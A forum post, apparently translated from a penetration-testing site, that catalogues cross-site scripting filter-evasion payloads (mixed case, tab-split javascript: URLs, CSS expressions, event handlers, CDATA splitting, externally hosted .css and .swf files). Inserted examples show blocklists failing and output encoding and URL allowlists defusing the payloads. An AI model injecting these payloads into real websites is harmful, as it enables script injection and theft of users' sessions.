China Network Penetration Testing Alliance

Title: Introduction to Cross Site Scripting (XSS) Attack Techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>
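As an added example (not part of the original post), the following JavaScript runs the payloads from sections 1 and 2 through two blocklist regexes a filter author might write, and then through HTML output encoding. The function names and the sample list are this example's own. It shows that the mixed-case variant slips past a case-sensitive match, the attribute-noise variants slip past even a case-insensitive match, and encoding the five HTML-significant characters neutralizes every one of them regardless of spelling.

```javascript
// Added example, not code from the original post. Sample payloads are the
// ones quoted in sections 1, 2 and 5 of the post above.

// Blocklist a filter author might write first: looks for the literal tag.
function naiveBlocklist(input) {
  return /<script>/.test(input);            // case-sensitive, exact tag only
}

// "Improved" blocklist: case-insensitive, but still expects a bare <script>.
function caseInsensitiveBlocklist(input) {
  return /<script>/i.test(input);
}

// Context-aware fix: encode the characters that have meaning in an HTML text
// node or a quoted attribute value, so untrusted text can never open a tag.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// True when the encoded output contains no raw '<' or '>' at all.
function neutralized(input) {
  return !/[<>]/.test(escapeHtml(input));
}

// Constructed sample set taken from the post's own payloads.
const SAMPLES = [
  "<sCript>alert('d')</scRipT>",              // section 1: mixed case
  "<<script>alert('c')//<</script>",          // section 2: extra characters
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',       // section 2: attribute noise
  '<SCRIPT/SRC="t.js"></SCRIPT>',             // section 5: slash instead of space
];

// For each sample: did either blocklist catch it, and does encoding defuse it?
function evaluate(sample) {
  return {
    sample,
    caughtByNaive: naiveBlocklist(sample),
    caughtByCaseInsensitive: caseInsensitiveBlocklist(sample),
    neutralizedByEncoding: neutralized(sample),
  };
}

function summarize() {
  return SAMPLES.map(evaluate);
}

for (const row of summarize()) {
  console.log(JSON.stringify(row));
}
```

Only the `<<script>` variant contains the literal tag, so the naive filter catches just that one; the case-insensitive filter adds the mixed-case sample but still misses anything with an attribute or a slash after the tag name. Encoding on output does not need to recognise any of these shapes, which is why it is the fix rather than a longer blocklist.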
3. Use another extension in place of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tab or new line characters to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

    The whitespace inside the word "javascript" stands for a tab or new line character; the browser discards these before it parses the URL, so the scheme is still recognised as javascript:.
7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an swf file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
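Added example covering sections 6 and 14 (not from the original post): a URL scheme allowlist for values that will be written into src, href or a CSS url(). Browsers, and the WHATWG URL parser, discard ASCII tab and new line anywhere in a URL and strip leading and trailing control characters and spaces before parsing, so a check that only inspects the prefix of the raw string is fooled by "jav<tab>ascript:". The names ALLOWED_SCHEMES, normalizeUrl, isSafeUrl and naiveCheck are chosen for this example, and the sample values are constructed from the payloads above.

```javascript
// Added example, not code from the original post. Demonstrates a scheme
// allowlist for untrusted URLs, with the same whitespace handling the browser
// applies, next to the naive prefix check it replaces.

// Schemes the application is willing to emit in src/href. Anything else,
// including javascript:, vbscript: and data:, is rejected.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Mirror the browser's pre-parse cleanup: drop tab/LF/CR anywhere, and trim
// C0 control characters and spaces from both ends.
function normalizeUrl(raw) {
  return String(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
}

// Returns true only for relative URLs or URLs whose scheme is allowlisted.
// A value with a scheme-looking prefix that is not allowlisted is rejected
// even if it was meant as a relative path ("bar:baz"), which is the safe side.
function isSafeUrl(raw) {
  const url = normalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(url);
  if (!m) return true;                       // no scheme: relative URL
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// The check the evasions in section 6 are aimed at: a prefix match on the raw
// string. Returns true when it *thinks* the value is safe.
function naiveCheck(raw) {
  return !String(raw).toLowerCase().startsWith('javascript:');
}

// Constructed samples: the post's payload shapes plus ordinary benign values.
const SAMPLES = [
  "jav\tascr\nipt:alert('XSS3')",            // section 6: tab and new line inside the scheme
  "  JaVaScRiPt:alert(1)",                   // leading spaces plus mixed case
  "javascript:alert('XSS27')",               // section 14: plain javascript: URL
  'data:text/html,<script>',                 // another active scheme
  'https://example.com/page?x=1',            // benign absolute URL
  '/images/logo.png',                        // benign relative path
  't.js',                                    // benign bare filename
];

function report() {
  return SAMPLES.map((s) => ({ value: s, naiveSaysSafe: naiveCheck(s), allowlistSaysSafe: isSafeUrl(s) }));
}

for (const row of report()) {
  console.log(JSON.stringify(row));
}
```

Run the check on the decoded value the application holds, and entity-encode it when writing the attribute so that any entity sequences in the value (the hex encoding of section 8) stay literal text instead of being decoded by the browser into a second copy of the URL. Event-handler attributes from section 9 are a different context: there a URL check does not apply and the attribute itself has to be disallowed.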




Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2